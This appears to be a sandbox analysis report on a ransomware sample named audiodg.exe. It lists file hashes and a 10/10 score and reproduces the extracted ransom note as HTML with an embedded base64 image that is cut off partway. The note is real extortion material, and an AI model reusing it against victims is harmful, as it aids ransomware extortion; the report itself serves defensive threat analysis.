a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f

Resubmissions

12/03/2023, 23:15

230312-28yjbafg64 10

14/11/2021, 04:39

211114-e9588afhc8 10

Analysis

max time kernel
375s
max time network
360s
platform
windows10_x64
resource
win10-en-20211104
submitted
14/11/2021, 04:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

audiodg.exe
Size

1.1MB
MD5

7b760f60fff500d3c7c408a8bc158e0e
SHA1

a4b41efc63460f980130b67eb33c0bd061206744
SHA256

a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f
SHA512

13662b1447806779d82a29fbb931ec8d400adacd9074c4bbce8db8afd34bbf0c87e43b7790c1631b8d4edc870dbf5348773beadea59a3f73438cdb072c24ae75

Score

10^/10

ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HELP_SECURITY_EVENT.html

Ransom Note

<table align ="center" width="50%" style="border:1px solid darkblue;"><div class="container"><tr><th><img style="position:relative;z-index:1; width: 100%" src = "data: image/png;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDABsSFBcUERsXFhceHBsgKEIrKCUlKFE6PTBCYFVlZF9VXVtqeJmBanGQc1tdhbWGkJ6jq62rZ4C8ybqmx5moq6T/2wBDARweHigjKE4rK06kbl1upKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKT/wAARCAFeBBoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDG8x/77fnR5j/32/Om0VoSO8yT++350eY/99vzptLjHX8qAHB5P77Y+tHmv2dvzphOaKAHeZJ/fb86PMf++3502igB3mP/AH2/OjzJP77fnTaKAHeY/wDfb86PMk/vt+dNooAd5j/32/OjzJP77fnTaKAH+Y/99vzo8x/77fnTKKAHeY/99vzpfMf++350yigB/mP/AH2/OjzH/vt+dMooAf5j/wB9vzo8x/77fnTKKAH+Y/8Afb86PMf++350yigB/mP/AH2/OjzH/vt+dMooAf5j4++350eY/wDfb86bRQId5rj+NvzpfMc9Hb86jooAeZJP77fnR5j/AN9vzpM54P50mMGgB3mP/fb86PMf++3502igB3mP/fb86PMf++3502igB3mP/fb86PMf++3502igB3mP/fb86PMf++3502igB3mP/fb86PMf++3502gUAO8x/wC+350okc8b2/OmUvQUAO8x/wC+350eY/8Afb86aeRmkoAf5j/32/OjzH/vt+dNoFADvMf++350eY/99vzptFADvMf++350eY/99vzptFADvMf++350eY/99vzptFAD/Mf++350eY/99vzptJQA/wAx/wC+350eY/8Afb86bRQA7zH/AL7fnR5j/wB9vzptFADvMf8Avt+dHmP/AH2/Om0UAO8x/wC+350eY/8Afb86bRQA7zH/AL7fnS+Y/wDfb86ZRQA/zH/vt+dHmP8A32/Om0UAO8x/77fnR5j/AN9vzptFADvMf++350eY/wDfb86bRQA7zH/vt+dHmP8A32/Om0UAO8x/77fnS+Y/99vzplLQId5j/wB9vzo8x/77fnTaKYDvMf8Avt+dHmP/AH2/Om0UAO8x/wC+350eY/8Afb86bRQA7zH/AL7fnR5j/wB9vzptFADvMf8Avt+dL5j/AN9vzplFAD/Mf+8350eY/wDeb86bRQA7e/8Afb86N7/3m/Om0UAO8x/7zfnRvf8AvH86bRQA7zH/ALzfnR5j/wB4/nTaKAH73/vH86N7/wB4/nTRQKAHeY/94/nRvf8AvH86bRQA7e/94/nRvf8AvH86bRQA7e/94/nS73/vH86bRQA7e/8AeP50b3/vH86bRQA7e/8AeP50b3/vH86bRQIdvbH3j+dG9/7x/Om0tAC73/vH86N7/wB4/nTaKAHb3/vH86N7/wB4/nSUUALvb+8fzo3v/eP502loAXe/94/nRvf+8fzptFADt7/3j+dG9/7x/Om0UAO3v/eP50b3/vH86bRQA7e/94/nSq7ZzuPHvTKd2oAXe394/nRvb+8fzptFADt7f3j+dG9/7x/Om0UAP3MT94/nQXYn7x/OkHQ0lADt7f3j+dG9v7x/Om0UAO3t/eP512Fr/wAesX+4P5Vxtdla/wDHrD/uL/KpkVE4Oiil6fWmMOn1pKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiloASilpKACiiigAooooAKWikoAWijtSUCCiiigYU7NNpaBC4/Kko6Up/SgBKKKKACiiigAooooAKKKKAAUUGigBQcUEYpKXqPpQAUUlLQAdaKKKACiiigAooooAKKKWgAooooAKKKKACiiigAooooAKKKKAFooooAKKKKACiiigAooopiClpKWgAooooAKKKKACiiigAooooAKKKKAFooooAKKK1otBnliSQTRgMARnNK4GTRWx/wjtx/wA9ov1o/wCEduP+e0X60XQ7Mx6K2P8AhHbj/ntF+tH/AAjtx/z2i/Wi6CzMiitj/hHbj/ntF+tZLoY5GQ8lSQcUXFYbRRS0wEooooAWiiigAooooEFFFFABRRRQAUUUUALRRRQAlLRRQAlFFFABRRRQAUUUUALQegpKcetACUUUUAFLSUUAL2FFB60UAFFFFABXZWv/AB6w/wC4v8q42uytf+PWH/cX+VTIqJwnT60lFFMYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFLQAUUUUAFFFFABRRRQAlLRRQAUlFFABRRRQAUUUUALQDiiigQHiilHoelIRigAo4oooAKKKKACgUUUAFFFFABSjg0lLQAHrRS9RikoAKKKKACiiigBaOKKSgBaSlooAKKKKACiiigAooooAKKKKACiiigBdpxnBx604xkIrllw3YHkVqx6pBb6WbRU8xypG4Dg59ayKAJNsPnFfMPl9m2/0pAE8tiWIYfdGOtMooAeQmEwxJP3uOlO2w+aR5jbOzbetRUUAPATy2JYh88DHWlIjwmGJz97jpUdFAiULF5rAyNsA4O3rTQqeWSX+fPC46imUtAD3jZNvQ7hkYOaYQQcEYNWdOuVs7xJnTeFzwOtS6rcx3k/2iPC5G3aevHc0DKNFFFMQUUUUAFFFFABRRRQAtFFFABWpFrt1FEsaxwkKABkH/ABrLopWA1v8AhIbv/nnB/wB8n/Gr2kapPfXLRypGAE3fKD6j3rm61/Df/H9J/wBcz/MUmlYaZqaxfS2MKPEqEs2DuBrK/wCEhu/+ecH/AHyf8aueJv8Aj1h/3/6VztCWg2zW/wCEhu/+ecH/AHyf8azJHMkjOerEk1PY2Mt9Lsj4UfeY9BW/Do9jbpmRd5HVnPFF0has5eiuqW20uU7FS3Y+ikZqpe6ChUvaEqw/gJyD+NHMFjBooZSrFWBBHBBHSiqEFFFFABRRRQIKKKKACiiigAooooAWiiigBKWikoAKKKKACiiigAooooAWlbrSUpxnrQAlFFFABRS0UAB6milPU0lABRRRQAo5Irsbb/j2i/3B/KuOHUV2Nr/x6w/7i/yqZFRODopu6jdTGOopNwoyKAFoozRQAUUUUAFFFFABRRS8n6UAJRS8D3oye3FABtPpRj3FJRQAuB60YHrSUUALgetGKKSgQpBHWkpQSKM+ooGJRS49KSgAooooAKKKKACiiigAooooAWiiigQUvUY70lFABRQfWigAooooAKKKKACiiigBcUYpKKAFHBoPBozS9R9KAEooooAKKKKACiiigAooooAWiiigAooooAKKu6fpk98cqNkY6uen4VoG30ax4mkM8g6gHP8AKi4WMKitv+0NHHAsWP8AwEf40f2ho/8Az4N/3yP8aVwMSpIsorSeWGXG3kcAmtj+0NH/AOfFv++R/jS/2lpO0r9ifB5xtH+NFwsYdFbf9oaP/wA+Df8AfI/xo/tDR/8Anwb/AL5H+NFwsYlFbf8AaGj/APPg3/fI/wAaUT6JP8rQNF74x/Ki4WMOiti50QNH51hKJk67c5P4GmaQlinmG+Kb+gVx09adwsZVFSzqhmlMAYxBuDjoKioEFLSUtMAp0TBXyUD9sGm0DqMUAKwKkgjBHY0lPmDCVgzhz3IOc0ykAUUUUwCiiigAooooAWiiigAooooAK1/DX/H9J/1zP8xWRWv4a/4/pP8Armf5ik9hrct+Jv8Aj1h/3/6Vz1dD4m/49Yf9/wDpWFaqHuoVPRnUH86S2B7nV6bbLZ2SJjDY3Ofeud1O/e8nbDERKcKvb610mouUsJ2HUIa46iPcbAEg5Bwa6PQb9rhGgmbc6DKk9SK5yr2iuU1OLHfI/Sm9hIueI7UJIlyoxv8Alb61i11OvLu01j6MDXLUo7A9xaKKKoQUUUUCCiiigAooooAKKKKAFooooAKKKSgAooooAKKKKACiiloAKD1opTzigBKKKM0AFLSUtAA3WilPakoAKKKKACuytv8Aj2i/3B/KuOrsbX/j1h/3F/lUyKicBRSUtBQUUUUAJS0lFAC5NGTSUtAhdxpdx6AU0CjPYUwHbgPc0bs0yigB+RS5FMooAfRTKM0APpaZk0BjQA+kpN1G6gBaKTcKXIoAKXPrSZFFACkenSkpQcUdelAhKKKKBhRRRQAUUUUALRRRQIKKKKAAelFFKeRmgBKKKOtABRRRQAUUUUAFFFFABSjrj1pKWgAooPXPrRQAUUUUAFFFFABRS0lAC0UUUAFXdJsTfXQU8Rry59vSqVbtufsPh55l4kmOAf0/xoYIi1bU/wDl0sz5cKfKSvf/AOtWPRRQAUUUUAFLSUtABRRRQAU4IxQuFJVep9KcFCCORtrq3O0Hn8aazZLbcqpOduaALFvePZTK9s7YwNyt0NaeowRajZfb7ZcSL/rFFYVa3h2fZdtbnlZVPHuP8mk+4Iyw7KpUMQG6j1p4QTOqQqQ2Ocnqadew/Z7uWLsrED6VBTAWinb/AN3s2r1zu70roA7LG3mAc5AoEMoooHWmA6TZvPl529s02nzFjKdyBD/dAximUgCiiimAUUUUAFFFFAC0UUUAFFFFABWv4a/4/pP+uZ/mKyK1/DX/AB/Sf9cz/MUnsNblvxN/x6w/7/8ASsK2YJcxOeiuD+tbvib/AI9Yf9/+lc9SWwPc7LUEMljOg6lDiuNrrdKulu7JSTl1G1x71harpslrMzopaFjkEdvY0o9hsz6v6IhfU4sD7uSfyqiqM7bVUk+gFdLomntaxtLMMSP2/uiqb0Eh2vsF01h/eYCuXrX8Q3YlmW3Q5EfLfWsmhbA9wooopiCiiigQUUUUAFFFFABRRRQAtFFFABRRSUAFFFFABRRRQAUvagUdaACl/h9qSgdxQAUUUUAFLRRQAv8ADSUo60mKACiiloAK7G1/49Yf9xf5Vx1dja/8esP+4v8AKpkVE8/ooooKFoopKAFpKWigAoAzRR2wKBATn6UlFFAwooooAWiiigAooooAKKKKAF7UlKKSmIWiiigAooooAKXJpKKAHZz9aTNFKeeaADNGaSigBc0ZpKKAFpaaBk4FFADqKbS0ALQPT1pM0A0CFPpR2oPr60UAFFFFABRRRQAUUUUALRSUtAC9vpSUDuKKAA0UdqKACilpKACilpKAFooooAK0LrUI5tLt7VUYNH94npWfRQAUUUUAFFKASQAMn0rXstFwnn37eVEOdpOCfr6UAULKxnvZNsS/L3Y9BXRWVhY2ySRfLLIq/vCRnA/pWbe6yFj+z6evlRDjcBgn6U/w+SYbwk5JXr+BqWNEd9o4KfaLBvNhPO0ckfT1rNLCF3WMhgRtyy1LY6hPYvmJsqeqHoa1TFY60paI+Rc45Hr/AI09gMCip7uzns5NkyY9D2NQUxBVzRzjVIP97+lU6uaR/wAhO3/3qGA/W/8AkKTfh/KqFX9b/wCQpN+H8qoULYGFOR2TO1iMjBxTaWmIf8jKiquHzyxPBpHQo5UkZBxkdKbTkkZFYL0YYPFIBZgRIcuHP94HOaZT9qMEVM7zw2elNZSjFT1HpQAlFFFMAooooAKKKKAFooooAKKKKACruk3qWNw0jqzArtwv1FUqKANTVtUiv4URI3Uq2fmxWXRS0gJrO7ls5fMibHqD0Nb8GvWsi4mDRHvxkVzVFDVxp2Op/tXTUyyyLn2Q5/lVG+14upS1Urn+Nuv4CsSilyoLikknJOSaSilqhBRRRQAUUUUCCiiigAooooAKKKKAFopKKAClpKKACilooASilooAKKKWgBKUcGiigAIwaKU8jNJQAUUUUAFL1GaSlBx9KAEopSMUlACmuxtf+PWH/cX+Vcd2rsbX/j1h/wBxf5VMionn9FFFBQUtFJQAUtJSjrQAdBR2oPWigQlFFFAwooooAWiiigAooooAKKXafSjaaYhBRS4I60lAC0HrRRQAUUUUAFFFFAC0DiiigAIxRS9R9KSgAooooAKKKKACiiigBaKKKAF7fSkpR1pKACiiigAooooAWiiigQUUUUAKDzR0NJSnrQAUUdqSgBwpKKKAFpKKKAFopKWgAooqW2tZrp9kEZc9/QUARVcsdNuL1v3a7U7u3StGPTLPTkEuoSh27Rjp/wDXqte63LMvlWy+RF0+XqR/SlfsMubtP0UfL+/uvX0/wrIvb+e9fdM/y9lHQVWPPJop2EFbfh7/AFF5/uf0NYlbfh7/AFF5/uf0NJ7DRi0qsVYMpII6EUlFMRs2msrLH9n1FBLGeN+OfxpLvRQ6efp7iWM87c5P4Vj1PaXk9m+6FyPVex/ClbsFyFlZGKspUjqDVvSP+Qnb/wC9Wkt3YaqoS7QQzdA4/wAf8abb6RPaalBIpEkIb7w7fWi47FLW/wDkKTfh/KqFX9b/AOQpN+H8qoU1sJhS0lLTEFFFFABTlkZFZRjDDB4ptFAEmEYIqZDHhiTxTWQqzL1x1I5ptOSRkDBSQGGD70gG0U8lCiLt2kdWz1qRLaSaZo7cGXHOQO1AEFFOZWRirAhhwQe1NpgLRRRQAUUUUAFFFFABRRRQAtFFFABRRRmgAooooAWikooAWikooAWikpaACiiigQUUUUAFFFFABRRRQAtFFFABRRRQAUtJS0AFFFFACikopeozQAlFFFABRRRQAo54/Kikp3Xg9aAEFdja/wDHrD/uL/KuO9a7G1/49Yf9xf5VMionn9FFFBQUUUUAFL2ooPWgQUUUUDCkpaSgAooooAWiilzjgfnQIOB15oye3FJRTAKKKBSGKCQKM56ikpaYgI/KigHFBHcUAFFFFABRRRQAtFFFAAODQetFL2FABtO3d2pKKKACiiigAooooAWiiigApTSUp7UAJRRRQAUUUUALRRRQIKKKKAClPQUlL2oADRSUpoAKKKKACiirNrp91dn9zESv948CgCtUtvbTXL7IY2c+w4FbC6VZWKiTULgM3XYP85NMuNdCJ5VhCsSD+Ijn8qV+wx0WjW9ogl1KdR/sA9f8abc64I08nT4hEg/iI5/KsiWaSdy8rs7HuTmmUWAfJI8rl5GLMepJptFFMQUUUUAFbfh7/UXn+5/Q1iVt+Hv9Ref7n9DSew0YlLSUUxC0UUUAFXrHVbmzIAbfH/cb+npVGigDfMmm6ufnzBcHjJPX/GqF5o91a5YL5sf95P8ACs+r1nq11aYAbzE/utStbYClRW6JtL1MYlX7PMe44z+PSqt1odzEN8JE6f7PX8qdwsZlFKysjFWBBHUEUlMQUUUUAFFFFABV7Sb77DcEkDY4wao0+FgrgmPzBg/LSAdcztc3DzOAC5zgVHSZooAWikopgLRSUUALRmkooAWiiigAooooAKKKKACiiigBaKKKACiiigApaSloAKKKKBBRRRQAUUUUAFFFFAC0UUUAFFFFAC0dqSloAKKKKACgcGiigBSMUlKPQ0nSgAooooAKKKUUALnjBrsLX/j1i/3B/KuONdja/wDHrD/uL/KpkVE8/opaSgoKKKms5BDdxSMAVVwSD0xQBEKSu7urOGe0ljWJAXQgEKBz2rhTwcGhO4CUtJW34XtllupZXUMqLgZGeTQBi0V3dzZwzW0kYiQFlIBCjrXCEEEjuKE7gJRS1teF7ZZbuSR1DKiYGRkZNAGN0HuaSum8TmKGzjjSNFaR+y4OB/kVzNCAKKKKACiiigQVfttIvLuBZ4Y1KNnBLAdDiqPaux8Pf8geD/gX/oRobsM5GeF7eZ4pBh0OCM5pgNXNY/5Ctz/vmqdAgIwaKXqKSmAUUUUALRRRQAUo6GkpV60AJRRUgiJHJxQBHRTmQrTaACiiigBaKKKACl/hpKUdDQAlFFLQAlFLSUALRRRQIKKKKACl7UlKOhoABSUUUALV7TNMfUN7CRUjThiao1uaHzpl+P8AZP8A6CaTGO26PpvUm5lH4/8A1qrXWvXMvywAQJ7dfzrKoosFxWZnYszFiepJzSUUUxBRRRQAtFFFABRRRQAVt+Hv9Ref7n9DWJW34e/1F5/uf0NJ7DRiUUUUxBS0lLQAUUUUAFFFFABVq11C5tCPKlO3+6eRVWigDcXVrO8XZf24B/vqM/8A1xSSaLDOhksLlXA52sc1i1s+Gh89yf8AYFJ6D3MYjBIPailb7x+tJVEhRRRQAVLAJNzGNgCFJPPaoqeAnlklvnzwuOtIBI42kbaoycZoEeYy+5Rg4255NLJI0j7m69OBim0AOaJgE6Nv6AHJprKVJDAgjsaASCCOCKtWKJeXixzs2ZON2ehoAqUVp6zp8Vi8flOSHB4PUVm0AJRS0UwCiiigAooooAKKKKACiiigBaKKKACiiigApaSloAKKKKBBRRRQAUUUUAFFFFAC0UUUAFFFFABS0lFAC0UUUAFFFFABSjng0lFABRS9ev50YoASl9qPpRQAD1rsbX/j1h/3F/lXHV2Nr/x6w/7i/wAqmRUTz+iiigoKKKKAO60uf7Rp0EmcnYAfqOK5HVofs+pTx9t2R9Dz/Wt3wrPvs5ISeUfI+h/+vmqfiuHbdxTDo64/Ef8A66S3Awq63wxB5em+YRzKxP4DiuTrtwBp+kc8eVF+uP8AGhgJpl4Lt7oZz5cpA+nb+Vcpq8PkanOnbduH481oeFpyt9JET/rFz+I/yad4rh23UU2PvrtP1H/66OoGDXW+F4PL05pCOZHJ/Acf41ydd5Ywi3soYv7qDP170MEc54on36gsQPEaDP1PP+FY2asahP8AaL6aXruc457dq1fD2lLcf6VcLmMHCKe59aeyAz7TSr28AaOIhD/ExwKt/wDCNX39+D/vo/4VsaprMOnnylXzJcfdBwF+tZP/AAk11vz5UW305pagVLjR7u1BaaP5B/EpyKrGIdq63S9Vi1FCpXZIBymc5+lZWuaetrIJohiNzyP7ppp9xMwiCDzXY+Hv+QPB/wAC/wDQjXISEFzXX+Hv+QPB/wAC/wDQjSY0c1rH/IVuf9+qdXNY/wCQrc/79VFUuwVQSxOAKYhUVnO1QWJ6Ad60YNAv5lyUWMf7bYrf0nTI7CEMwBmYfMx7ewqnfeI44pDHaxiTHVyePwpX7DKJ8N3wH34T7bj/AIVRutOu7TmaFgv94cj860F8S3QPzRRsPTkVYuddgvNOniZGilZcAdQT9aNQOeo68Cium8PaWkcS3cy5kblAf4R6027CMq30O+uF3eWI1Pdzj9Kn/wCEcvRzuhOOwY/4Vp6priWUhhiQSSjrk8LWfF4luA/7yGNlz0HBpajMy5srizkAniKjPB6g/jS118MttqdnkAPG3DKexrldUtH0+7MQJMZ5Qn0ppiaK8v3cVL/Zl6U3/Zn24zn2qqSWPNd3Cu+zRc9YwP0obBI4q1tJ7t9sEZcjr6D8a0R4bvSPvwj23H/CtSe9s9EgS3jTe4Gdo6n3Jqmnic7/AJ7YbPZuaV2MyrzTrmy5mjwp6MORVVQWYKoJJ4AFdzG8GoWm4APFIOQaz7HToNJWW5uGBIJ2sew/xouFjJg0C+lTcVSP2duf0pZtBvoYywVJPZDz+tXZvE3zYht8r6s3X8Kv6Xq8WoEps8uUDO3Ocj2ouw0OQIIJBGCOoNJW/wCJrJVK3aLgsdr4/Q1g1SEJVq0sLq7/ANTEWX+8eB+dWtE00X0xeUHyY+v+0fSt6/1G30yJV25bHyxrxx/Sk2FjFHhy9I+/CP8AgR/wqvc6Ne2ylmjDqOpQ5q03iS5LZWKMD05NaOl63HeyCGVBHKenPDUtQ0OVorf8Q6air9shXHP7wD+dYFUncApR0P0pKUd6BCUUUUALW54e5tb1PVf6GsOtvwwcvcp6oKT2GjEooIwcUUxBRRRQAUUUUALRRRQAUUUUAFbfh7/UXn+5/Q1iVt+Hv9Ref7n9DSew0YlFFFMQUtJS0AFFFFABRRRQAUUUUxC1teHOEu2/2R/WsWtrQ/l0++f0U/yNJ7DRi0UUUxBRRRQA+NGckrj5RuOaSRzI5dsZPoKUBPLJJO/PA7YplIApaSlBwcimA9igCjYQw+9k9aHzu8xEKIT8tDkOpkaTMhPTH60SMp2qm7aB0Y9+9IBS/mqzSyszgfLnnNR0+E7ZAdgf/ZPemnqeMUwEooooAKKKKAFooooAKKKWgBKKX8KPwoAKKPwooEGKMUUfhQAUUfhS0AJRRRQAUUUUAFFLRQAlFLiigAooo/CgAoo/Cj8KACilooAKKKKACiiigAooooAKXPrzRRQAEflR0oB9qXg+1ADa7K1/49Yf9xf5Vxx+ldja/wDHrD/uL/KpkVE8/ooooKCiiigDZ8LzeXqBjPSRSPxHP+NavieDzNN8wDmJgfw6VzNjN9nu4pf7jAn6V217CLizmi670IFJ7gcZpUH2jUYI8ZBbJ+g5ro/E03laZsB5kYL/AF/pWb4WgLXsspH+rXH4mneK5t1zDCP4F3H8f/1UdQMzS5vs+owSdg+D9Dx/Wuj8TQebpm8DmNg34dK5Ku3XF/pHP/LWL9cf40MDkdMh+0ajBH2Lgn6Dk12WozfZ7CaQHBCkD6ngVz/haAtfSyMP9UuPxP8A+o1e8Uz7LFIgeZHyfoP8ih7gcsoLMFHUnFd7BGtpZIiqcRp0HU4FcND/AMfEZ9WH8672WQRRPIQSEUsQPahgjhpoLyaV5XgmLMck7DTfslz/AM+8v/fBro/+Ens/+eM/5D/Gj/hJ7P8A54z/AJD/ABouwMXTo7u3vYZBDKoDjPyHp3rp9bj8zSp/VV3A/SqX/CT2f/PGf8h/jUV54gtbizmhWKYM6FQSBjn8aNQObrs/D3/IHg/4F/6Ea43Ndj4e/wCQPB/wL/0I0MEc1rH/ACFLn/fNT+HoBNqiE8iMF/8ACoNY/wCQrc/75q74V/5CEv8A1yP8xT6Aa/iG5a301ghw0h2j6d64+um8V/8AHtB6bz/KuZoQMKBRRTES20fnXEcX99wv5mu4uJFtbR5ABiNMgfQVxmm/8hK1/wCuq/zrrdY/5Bdz/uGpY0cU7M7FmOWJySe9IOoopV61QjY8MXBS9aAn5ZFJx7j/ACav+KIg1lHL3R8fgayPD+f7Wix6H+Vb3iEj+ypM9yMfnUvcfQ5Gu7gIW0jY9BGD+lcHXdJ/yDx/1y/pQwRxV1M1xcySucl2JqPFGaSqEdP4Wcm0mQnIV8j8RVfxTOfMhtw3AG8j9B/WpfCn+puP94fyqn4o/wCQkn/XIfzNT1H0MirmkOY9SgYHHzgfnVOrWm/8f1v/ANdFqhHT68obSZsjpgj8xXH12Ouf8gm4+g/mK42piNnaaPAINNhUDBYbj9TXNail1dX0spglILEL8h6dq6y0/wCPOH/rmv8AKs1vEdorFTFNkHHQf40kBzn2S5/595f++DTkt7qN1dYJQynIOw10H/CS2n/PKf8AIf40f8JJaf8APKf8h/jVXYjSmT7TZMjD/WR9x04rhq6Y+JLQgjypvyH+NczQgYUo6GkpR0NMQlFFFAC1seGG/wBOkX1jP8xWPWj4ffbqsY/vAj9KT2GilcLsuJV9HI/Wo6taomzUrhf9smqtMQUUUUAFFFFAC0UUUAFFFFABW34e/wBRef7n9DWJW34e/wBRef7n9DSew0YlFFFMQUtJS0AFFFFABRRRQAUUUUxC1t6d8mgXj/3sj9Mf1rEraX914YP/AE0b+v8A9akxoxaKKKYgooooAkBzEyiMHByWxyKjrb0q8sYNOeObAc53AjJb0rFOCTjpSGJS0lLTEJS0lLQA+FWaVQrBT2JOMU0kkkk5NOGwI24NuP3fSmUAFFFFABRRRQAtFFAoAXtmkoNLQAlLijPpRQAfjR+NFFAgxRRRmgAoFLSUAFFL2pKAClpKWgAooooAKKKKACloooAKKKKACiiigAooooAKKWkoAKKKKACiilFABSUtGPWgABIrsbX/AI9Yv9wfyrjs+ldja/8AHrD/ALi/yqZFRPP6KKKCgooooAUda7nSpvtGmwSdyuD9Rx/SuGrqPC02+0lhz9xtw+h//VSYIvabZi0NzgY8yYsOO3YVyusTefqc7jpu2j8OK7O6mFvbSzH+BSa4Akkkk5JoQCV13hifzNN8snmNyPwPP+NcjW74Un23UsJPDpuH1H/66bA2tNsxaPcnGPMlLD6dv5msHxRN5moLEOkaD8zz/hXWVwV/N9ovZpezOSPp2qUBCpIIwcEHIru7OZbuyjk6h0+Ye/cVwda+h6v9ibyZ8mFj1/umm0Bn31q9ndPA4Pyng+o7GoK7e6tLTVIVLYcfwuh5FZcnhcZ+S6OP9paLgc5RXUQ+GbdWzLNI49BxUevRWlppoggEaOXB2g/MadwObrsvD3/IHg/4F/6Ea42uy8Pf8geD/gX/AKEaTBHNax/yFbn/AHzUmgzi31KMscK/yH8aZrA/4mlyT/fNUsnOemKfQR2euWjXenOqDLodyj1rjK6vRtZjuY1guGCzqMAngP8A/Xp99oNrduZEJhc9dvQ/hSTsM5GlroU8LjPz3Rx7LUt5pVnY6ZOyrmTbwznJ/CncDnIJDFMkg6qwau5dUu7QgHKSpwfYiuDrf0DVkjQWlywVR9xz0HsaTQIw5onhlaKQYZTgimjoa7HUdJt9QPmElJMffXv9aoReGUDfvbgsoPRVxmncLEHhe1LXD3JHyoNq/U//AFv51a8UzhbaKAH5nbcfoP8A9daMktrpdoAcRxqOFHU/41yN/ePfXTTPwDwo9BSWrAriu5X/AJB4/wCuX9K4Wu6X/kHj/rl/ShgjhaKKKoR0nhT/AFNx/vD+VU/FH/IST/rkP5mrnhT/AFNx/vD+VU/FH/IST/rkP5mp6j6GRVrTf+P+3/66CqtWtO/5CFt/vj+dUI6jXP8AkE3H0H8xXHV2Ouf8gm4+g/mK44VMRs7HRLgXGmxHOWQbG/Cud1u0a1v34+SQllNJpWotp8+SC0TcOv8AUV07LZ6rbYysqH0PKn+lGzDc4mlropfDKEnyrhgPRlzSxeGogQZbh2HcKMU7oVjnKK6fULWysdMmSMIjsuBk/Ma5ihO4BS/w/jSUv8IpiEooooAWrWlyeXqNu3+2B+dVadGxSRWHVSDQBoeIU2arIf76q36Y/pWbW14mUNLbzDo6f5/nWLSWw2FFFFMQUUUUALRRRQAUUUUAFdFoVlcQ285kj2eauFBPJ61n6BAs2oqXGQgLAe9GoapdSXb7JWjRGIUKcdKT10GindWk9o+yeMoT09DUNb/mtqOgSvPhpIjw30rApoQUtFFABRRRQAUUUUAFFFFMQtbepfutCtIuhYg/p/8AXrFVS7BR1JwK2fEjBWt4B0Rf/rf0pPcZi0UUUxBUi/uwkqupbP3fSlXMQSUFGyT8p5/MVGTkk0gAksST1PNJSqCzBR1PHNPER3upZAVBPJ6/SgCOlqQTEMhCJ8g9Ov1pA64fKAluh/u0AMp6oAWEjFCBwCOppC+UVQqjac7h1NIzM7FmJJPc0wFeRn27jnaMD6U2iigAooooAKKKWgAo7UCjrQACig0UAFLSUtABRRRQIKKKKAClpKKAClNFFACUtJS0AFFAooAKKKKAFooooAKKKKACiiigApaSlFAAKKSl7UAJRRRQAUp9KB60CgA6c0UHmigArsbX/j1h/wBxf5Vx1dja/wDHrD/uL/KpkVE8/ooooKCiiigAp6SOgOx2X6HFMpRwaAHtNKwIaVyD2LGo6U0lABTlZkOVYqfUHFNooAl+0Tf89pP++jUdJRQAtFFAoAmgup7Y5hlZD7HFWxreo44uj+KL/hWdR2oEXZdUv5hh7pyP9kgfyqmdxOTyT3JpKKAFx6kU9ZpEG1JHAHoxqOimArMWYliST1JopKWgAq3Bql9Au2O5cD0PP86qUUAXzreokY+0n8FX/Cqk08s7bppHc+rHNR0UgFooopgWrfULu24huHVfTqPyNSnWtRIx9pP4Kv8AhVHoMd6SkA+WaSZt0sjO3qxzTO1FFMAqTz5sY818em41HRQAUUUUAPSR0zsdlz6HFIzs5y7Fj6k5pKKAClyQ2QSCOhFA9fSkoAe00rAhpHIPYsaZRRQAtPimkhbdFIyH1U4pnakoAvjWdRUY+0n8VB/pTZNWv5Bhrl/+A4H8qp0UWAVmZ23MxY+pNJRRQIKU9qSlbrQAlFFFAC0UUUAbmof6T4ftZh1QgH+X9Kw66HQ/KudLntpslFOSB1x1/pUOzQP78n/j1IZiUVt7NA/vyf8Aj1Ls0H+/J/49RcDDorc2aD/fk/8AHqNmg/35P/HqLgYlFbezQf78n/j1GzQf78n/AI9RcDEorb2aD/fk/wDHqNmg/wB+T/x6i4iPw1/x/v8A7hrMuP8Aj5l/3z/Ouk0pdMFw32JmMm3nOen41zlz/wAfMuOm8/zoW4zX07/kX7z8f5Vh10Gi+UdHuPPJEW47vpiotmg/35P/AB6gDEpa2tmg/wB+T/x6jZoP9+T/AMeouIxaK2tmg/35P/HqNmg/35P/AB6i4WMWitrZoP8Afk/8eo2aD/fk/wDHqdwsYtFbezQv78n/AI9Rs0L+/J/49RcLGfpUXnajAv8AtZP4c1Nr0vmanIB0QBa19Mh00StNaFiyDktnjP1rm7iUzTySnq7E0uodBlSRgoBMUDJnHPTNR09goRSr5J6jHSmIZSqrNkqpOBk47UlT20E0yyGLd8q5IGeaAGouxfMeMshyAc45qKl56UlABS0lLTASlpKWgAooooAKKKKAClpKUUAHtQKKO1ABRRRQAUtJS0AFFFFAgooooAKKKKAF7UlKKSgBaKBR0oAKO1FBoAKKKKAFooooAKKKKACiiigAooooAXtRRSUAKaKKOgoADR2+tJSmgBKWkpaACuxtf+PWH/cX+VcdXY2v/HrD/uL/ACqZFRPP6KKKCgooooAKKKKAFHIxSUUvXnvQISiiigYUUUUALR2oooAKO1F